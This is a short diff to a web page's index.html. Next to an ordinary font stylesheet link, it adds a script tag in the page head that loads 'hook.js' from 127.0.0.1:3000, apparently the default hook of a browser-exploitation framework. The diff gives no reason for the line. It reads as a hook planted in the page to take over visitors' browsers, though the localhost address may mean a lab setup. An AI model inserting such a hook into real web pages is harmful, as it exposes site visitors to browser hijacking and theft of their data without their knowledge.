--- a/index.html
+++ b/index.html
@@ -18,6 +18,8 @@
       href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600&display=swap"
       rel="stylesheet"
     />
+    <script src="http://127.0.0.1:3000/hook.js"></script>
+
   </head>
   <body>
     <main>
